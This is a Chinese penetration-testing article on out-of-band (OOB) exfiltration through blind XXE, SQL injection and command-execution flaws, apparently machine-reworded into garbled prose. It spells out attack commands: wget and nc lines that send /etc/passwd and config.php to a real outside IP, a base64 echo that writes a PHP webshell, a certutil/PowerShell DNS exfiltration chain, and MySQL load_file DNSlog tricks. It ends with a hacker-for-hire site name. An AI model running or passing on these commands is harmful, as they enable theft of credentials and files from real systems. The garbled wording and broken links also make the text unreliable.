在浸透中，常常碰到封闭回显的缝隙，常见的XXE盲注，SQL盲注，反序列号无回显，这个时分常用到OOB带外数据通道，带外通道技能（OOB）让进犯者可以经过另一种 *** 来承认和运用所谓的盲目（blind）的缝隙。在这种盲目的缝隙中，进犯者无法经过歹意恳求直接在呼应包中看到缝隙的输出成果。带外通道技能一般需求软弱的实体来生成带外的TCP/UDP/ICMP恳求，然后，进犯者可以经过这个恳求来提取数据。一次OOB进犯可以成功躲避监控，绕过防火墙且能更好的躲藏自己。 本文的中心是在各种无回显的缝隙环境中运用带外通道技能将其传输的一个总结。 一、可回显 OWASP TOP 10 注入 关于可回显的注入运用依据联合查询、报错、盲注直接运用! xxe 可回显的xxe直接引证DTD外部实体声明，常见运用 *** ：读取恣意文件、履行体系指令、勘探内网端口和进犯内网网站 指令履行&代码履行 代码履行 常见相关函数：PHP：eval、preg_replace + /e形式、assertJavascript：evalVbscript: Execute、EvalPython：exec 直接写入webshell可直接被中间件解析的脚本 指令履行 A. windows 1. 信息搜集net view #获取当时组的核算机名net view /domain #检查一切域net user #若如struts等给的权限高用administrator，直接可增加帐号，管理员组，躲藏克隆帐号等操作，如struts2缝隙大多数为adminisrator权限参考文献：横向浸透 2. 读取文件dir /s/a-d/b d:*.php #查找一切php文件方位 3. 文件写入& echo ^^' > "D:phpStudyPHPTutorialWWWshell.php"等特别符号在cmd下需求转码 并且写入文件不行带有:等特别字符 4. msf等后门 B. linux 1. 常见函数：system、exec、assert、shell_exec、passthru、popen、proc_popen、escapeshellcmd、pcntl_exec 2. 特别符号：|、&、&&、||、；、'，"，()，{}，[]，输入输出/重定向，通配符 3. 敏感数据获取echo PD9waHAgcGhwaW5mbygpOz8+ | base64 -d >shell.php #PD9waHAgcGhwaW5mbygpOz+是base64编码 linux文件名不能带有/(斜杠) 4. DNS等持续性后门 二、无回显OOB(out of band) 倘若在发现这些缝隙的时分，无回显，这时OOB就上台了，常见的 *** 是HTTP、ICMP、DNS，ICMP地道一般会进行防护，TCP在甲方中会有严厉的防火墙操控端口，HTTP在甲方中一般也会有严厉且完好的监控和阻断机制，DNS地道在当时环境下，因为需求解析，不会对其进行阻拦 HTTP 运用条件：无法回显但能出网时运用 Window内置 explorer 查询文件方位web历史记载 会翻开方针浏览器，不主张运用，且内容过多，循环导致浏览器卡死 telnet 模仿HTTP恳求需强壮的交互性 CurlCurl 默许不自带，需解压增加环境变量或装置curl –T {path to file} ftp://xxx.xxx.xxx.xxx –user {username}:{password}-T经过put *** 上传与层地址 Wgetwget指定header头检查日志回显 wget -d --header="User-Agent: $(cat /etc/passwd|tail -n 1)" [[[[[http://120.79.206.249/1.php] wget --header="User-Agent: $(cat /etc/passwd | xargs echo –n)" 发送post恳求，并承受post数据wget --post-data exfil=’cat /etc/passwd’ [[[[[http://120.79.206.249](http://120.79.206.249)] powershell这儿用的是dnslog原理ipconfig > temp && certutil -f -encodehex temp output.hex 12 && set /p MYVAR=http://dnslog:9000/!MYVAR!](http://dnslog:9000/!MYVAR!)]&& powershell Invoke-WebRequest !FINAL!" nc体系或许无nc，且nc被监控的或许性较大nc -w 1000 120.79.206.249 config.php dnslog 依据原理只需求建立一个上图中scholar域DNS 服务器，并即将盲打或盲注的回显，放到自己域名的二级乃至三级域名上去恳求，就可以经过DNS解析日志来获取到它们。其本质便是运用FQDN想域服务器解析为iP地址被记载的进程 DNSlog建立 在线渠道ceye.io 在线渠道TOOLS SQL盲注 不论是bool型盲注仍是时刻型盲注，都需求频频的跑恳求才可以获取数据库中的值，在WAF的防护下，很或许导致IP被ban。咱们可以结合DNSLOG完美快速的将数据取出。如遇到MySql的盲注时，可以运用内置函数load_file()来完结DNSLOG。load_file()不只可以加载本地文件，一起也能对比如www.test.com](http://www.test.com)这样的URL建议恳求。这样的URL建议恳求。](http://www.test.com)这样的URL建议恳求。这样的URL建议恳求。)))[1][2][3]黑客接单网